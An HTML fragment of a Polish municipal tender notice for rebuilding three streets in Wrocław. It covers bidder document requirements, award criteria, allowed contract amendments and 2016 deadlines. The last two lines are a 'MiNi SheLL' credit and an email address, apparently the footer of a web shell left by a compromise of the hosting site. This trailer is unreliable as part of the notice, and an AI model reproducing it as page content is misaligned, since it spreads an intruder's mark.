UWAGA: jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej, Wykonawca może przedłożyć inne dokumenty określające czy najważniejsze roboty zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

W przypadku gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie robót budowlanych zostały wcześniej wykonane Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru. W przypadku Wykonawców wspólnie ubiegających się o
udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego
zamówienia publicznego, 2. Dowód wniesienia wadium dla Części 1 lub Części 2. 3. Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów
dotyczących w szczególności: - zakresu dostępnych wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia, - charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, - zakresu i okresu udziału innego  podmiotu przy wykonywaniu zamówienia. 4. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b PZP odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów chyba że za nieudostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin gwarancji z wyłączeniem zieleni - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>dotyczy Części 1 oraz części  2: 
Wszelkie zmiany umowy mogą być dokonane za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności, wyłącznie na zasadach określonych w art. 144 ustawy Prawo zamówień publicznych.
Zamawiający przewiduje możliwość zmiany do Kontraktu w przypadkach opisanych w Klauzuli 13.2. [Inżynieria wartości], 
a także w przypadku zaistnienia następujących okoliczności, które nie zostały  lub nie mogły być przewidziane w czasie prowadzenia postępowania:
1)	zmian ogólnie obowiązujących przepisów, prawa miejscowego oraz wymogów dotyczących Zamawiającego bezpośrednio odnoszących się do praw i obowiązków stron umowy; zmiany umowy dokonane mogą być tylko w zakresie niezbędnym do dostosowania zapisów umowy do wprowadzonych przepisów. 
2)         zmian w zakresie terminów realizacji inwestycji:
2.1. spowodowanych warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności:
a) klęski żywiołowe,
b) warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie prób    i sprawdzeń, dokonywanie odbiorów,
c) niewypały i niewybuchy,
d) znaleziska archeologiczne,
e) odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego warunki geologiczne,
f)  odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego warunki terenowe, w szczególności istnienie podziemnych sieci, instalacji, urządzeń, lub nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty, ściany szczelne itp.),
2.2. będących następstwem działania organów administracji, w szczególności:
a) przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp.,
2.3. spowodowanych innymi przyczynami niezależnymi od Wykonawcy skutkującymi niemożliwością lub utrudnieniami w terminowym prowadzeniu prac, w szczególności:
a) protesty mieszkańców skutkujące całkowitym wstrzymaniem Robót,
b) wystąpienie konieczności wykonania robót dodatkowych, uzupełniających, zamiennych wstrzymujących lub opóźniających realizację robót będących przedmiotem Kontraktu; 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 2 Czas na Ukończenie może ulec odpowiedniemu przedłużeniu o czas niezbędny do wykonania przedmiotu Kontraktu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. W sytuacji wprowadzenia zmian w zakresie terminu realizacji oraz jako konsekwencja ich wprowadzenia Zamawiający dopuszcza możliwość wprowadzenia zmian dotyczących sposobu rozliczenia niniejszej umowy, o ile taka zmiana będzie korzystna dla Zamawiającego.
3) Zmian w zakresie realizacji inwestycji z przyczyn technicznych, które nie mogły być przewidziane w czasie prowadzenia postępowania, w tym przede wszystkim w zakresie niezinwentaryzowanego mienia, odkryć archeologicznych i podobnych przeszkód, które zostały ujawnione podczas wykonywania prac. Zmiana zakresu zamówienia określonego w SIWZ, jest możliwa tylko z zakresie niezbędnym, aby wykonawca po ustaniu lub usunięciu przeszkód mógł wykonać przedmiot umowy w sposób zgodny z SIWZ. 
4) Zmian w zakresie realizacji inwestycji, które nie mogły być przewidziane w czasie prowadzenia postępowania z przyczyn technicznych, a polegających na obiektywnej konieczności zmiany technologii wykonania przedmiotu zamówienia, zastosowania rozwiązań zamiennych, zastępczych lub równoważnych. Zmiana zakresu prac określonego w SIWZ, jest możliwa tylko w zakresie niezbędnym do zgodnego z obowiązującymi standardami, wymaganiami technicznymi oraz normami prawidłowego wykonania przedmiotu umowy w sposób zgodny z SIWZ.
5) Zmiana może nastąpić również wtedy, gdy Zamawiający z przyczyn ekonomicznych, technicznych lub prawnych zmieni sposób wykonania przedmiotu zamówienia wprowadzając inne rozwiązania techniczne lub projektowe z korzyścią dla interesu publicznego. 
6) Jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby Wykonawcy rażącą stratą, czego strony nie przewidywały przy zawarciu umowy, Zamawiający dopuszcza możliwość zmiany umowy, poprzez zmianę sposobu jej wykonania lub zwiększenia wynagrodzenia Wykonawcy, opierając się na zasadach współżycia społecznego, interesów Zamawiającego i Wykonawcy. Przy czym zmiana umowy dopuszczalna jest tylko w zakresie usunięcia rażącej straty jaką poniósłby Wykonawca w związku z wykonaniem zamówienia,
7) Zmiany w zakresie zmniejszenia zakresu rzeczowego zamówienia, co w konsekwencji prowadzić będzie do odpowiedniego zmniejszenia wynagrodzenia Wykonawcy.,
8) W przypadku, gdy w umowie znajdują się oczywiste błędy pisarskie lub rachunkowe, a także zapisy, których wykonanie jest niemożliwe z uwagi na obowiązujące przepisy prawa - w zakresie, który jest niezbędny dla usunięcia tych błędów, 
9) Strony dopuszczają zmianę sposobu wykonania umowy ze względu na zaistnienie siły wyższej. Zmiana umowy dopuszczalna jest tylko w takim zakresie, aby po ustaniu działania siły wyższej, Wykonawca mógł wykonać przedmiot zamówienia w sposób zgodny z SIWZ. Pod pojęciem siły wyższej rozumie się wszystkie zdarzenia zewnętrzne niemożliwe do przewidzenia i niemożliwe do zapobieżenia przez strony(ę) umowy, a zaistniałe po podpisaniu umowy, w szczególności takie jak:
a) wojny, działania wojenne, inwazje, działania wrogów zagranicznych,
b) terroryzm, rewolucje, powstania, wojny domowe,
c) rozruchy z wyjątkiem tych, które są ograniczone wyłącznie do pracowników Wykonawcy lub jego podwykonawców lub Zamawiającego,
d) zanieczyszczenie i inne podobnie niebezpieczne skutki spowodowane przez substancje toksyczne, z wyjątkiem tych, które mogą być przypisane użyciu przez Wykonawcę takich substancji,
e) działania sił przyrody, huragany, powodzie,
f) ogólnokrajowe bądź regionalne spory w przemyśle lub też spory, które są częścią ogólnonarodowej lub regionalnej kampanii, a którym Strona nie mogła zapobiec.
10) Zamawiający (tj. Gmina Wrocław) prowadzi aktualnie prace  nad oceną skuteczności, energochłonności i trwałości wykorzystywanych systemów oświetleniowych dróg, urządzeń wchodzących w ich skład oraz możliwości objęcia ich spójnym i efektywnym systemem zarządzania w skali całego Miasta.  Efekty i wnioski wynikające z tych prac, w tym w jaki sposób będą one oddziaływać na zaplanowane dla przedmiotowego zadania rozwiązania w zakresie oświetlenia drogowego nie są jeszcze znane. W związku z tym Zamawiający przewiduje możliwość zmiany umowy w zakresie wprowadzenia w oświetleniu drogowym rozwiązań zamiennych do pierwotnie opisanych dostosowujących poziom techniczny i ekonomiczny oświetlenia oraz sposób jego zarządzaniem do poziomu optymalnego standardu miejskiego w tym zakresie wynikającego z prac, o których mowa wyżej, o ile ich wprowadzenie Zamawiający uzna za korzystne dla Zamawiającego.  
Do wyceny robót zamiennych stosuje się następujące zasady:

Odpowiednia stawka lub cena dla każdej pozycji robót winna być taka, jaka została zatwierdzona w umowie dla tej pozycji lub, jeśli takiej nie ma, to ustalona dla podobnej roboty. Dla pozycji robót będzie jednak ustalana nowa stawka lub cena, jeśli łącznie są spełnione:
a)            dla danej pozycji nie jest w umowie przewidziana żadna stawka ani cena, oraz
b)            żadna stawka ani cena nie są odpowiednie, gdyż dana praca nie ma podobnego charakteru, albo nie jest wykonywana w warunkach podobnych do żadnej innej w umowie.
Jeżeli dla wyprowadzenia nowej stawki lub ceny brak jest podstaw w umowie, to należy ją wyliczyć na mocy uzasadnionego kosztu wykonania takiej roboty wraz z rozsądnym zyskiem, biorąc pod uwagę wszystkie okoliczności towarzyszące. W takim przypadku koszt zostanie ustalony na podstawie normatywów określonych w Katalogach Nakładów Rzeczowych (KNR) przy użyciu średnich, dla rejonu Dolnego Śląska cen materiałów, urządzeń, pracy sprzętu budowlanego, stawek robocizny kosztorysowej oraz innych wskaźników cenotwórczych, określonych w informacjach - SEKOCENBUD, wydawanych przez Ośrodek Wdrożeń Ekonomiczno - Organizacyjnych Budownictwa Promocja Sp. z o.o. W celu ustalenia kosztu Wykonawca przedłoży Inżynierowi kosztorys takich robót sporządzony z uwzględnieniem powyższych zasad.
Przewidziane zmiany do umowy mogą być powiązane z podwyższeniem lub obniżeniem Zaakceptowanej Kwoty Kontraktowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wi.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wrocławskie Inwestycje sp. z o.o.; ul. Ofiar Oświęcimskich 36, 50-059 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2016 godzina 11:30, miejsce: Ofertę należy złożyć w siedzibie Wrocławskich Inwestycji Sp. z o.o. (5 piętro, pokój nr 3 - sekretariat), Wrocław 50-059..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> UWAGA: Termin, o którym mowa w pkt  II. 2) powyżej dotyczy Części  1 niniejszego zamówienia. 

Termin dot. Części 2, o którym mowa w pkt. 3) w załączniku nr I do niniejszego ogłoszenia o zamówieniu (8 miesięcy)   dotyczy wykonania wszelkich Robót oraz oddania przedmiotu zamówienia do użytkowania 
w terminie do 8 miesięcy od daty otrzymania Powiadomienia o Dacie Rozpoczęcia, przy założeniu, że termin rozpoczęcia nie będzie późniejszy niż 03.03.2017 r. (jeśli termin miałby być późniejszy, wiążący jest termin 3.03.2017 r.)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część nr 1 - Przebudowa ul. Białodrzewnej i Bukowej we Wrocławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 1 - Przebudowa ul. Białodrzewnej i Bukowej we Wrocławiu obejmuje w szczególności:
a) przebudowę nawierzchni jezdni na odcinku objętym opracowaniem,
b) wykonanie robót ziemnych związanych z robotami drogowymi
c) budowę kanalizacji deszczowej
d) budowę kanalizacji sanitarnej
e) przebudowa sieci wodociągowej wraz z przyłączami
f) budowa spięć sieci wodociągowej
g) budowę kanalizacji kablowej MTKK
h) budowę oświetlenia drogowego,
i) wyniesienie projektu organizacji ruchu docelowego
j) wykonanie wycinki zieleni i zabezpieczenie zieleni przeznaczonej do pozostawienia.
k) wykonanie nasadzeń zieleni i trawników oraz pielęgnacja w okresie gwarancyjnym
l) uporządkowanie i rekultywację terenu po robotach budowlanych wraz z likwidacją zaplecza budowy
m) wszelkie inne prace wynikające z przyjętych rozwiązań projektowych

Szczegółowy opis przedmiotu zamówienia został przedstawiony w Części III Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.21.00-3, 45.23.24.10-9, 45.23.24.51-8, 45.23.24.60-4, 45.23.32.52-0, 45.23.32.53-7, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin gwarancji z wyłączeniem zieleni - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część nr 2 - Przebudowa ul. Grabowej we Wrocławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część nr 2 - Przebudowa ul. Grabowej we Wrocławiu obejmuje w szczególności: 
a)	przebudowę nawierzchni jezdni na odcinku objętym opracowaniem,
b)	wykonanie robót ziemnych związanych z robotami drogowymi
c)	budowę kanalizacji deszczowej
d)	budowę kanalizacji kablowej MTKK
e)	budowę oświetlenia drogowego,
f)	budowa sieci kanalizacji sanitarnej
g)	budowa sieci wodociągowej
h)	wyniesienie projektu organizacji ruchu docelowego
i)	wykonanie wycinki zieleni i zabezpieczenie zieleni przeznaczonej do pozostawienia.
j)	wykonanie nasadzeń zieleni i trawników oraz pielęgnacja w okresie gwarancyjnym
k)	 uporządkowanie i rekultywację terenu po robotach budowlanych wraz z likwidacją zaplecza budowy
l)	wszelkie inne prace wynikające z przyjętych rozwiązań projektowych

Szczegółowy opis przedmiotu zamówienia został przedstawiony w Części III Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.21.00-3, 45.23.24.10-9, 45.23.24.51-8, 45.23.24.60-4, 45.23.32.52-0, 45.23.32.53-7, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 8.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin gwarancji z wyłączeniem zieleni - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com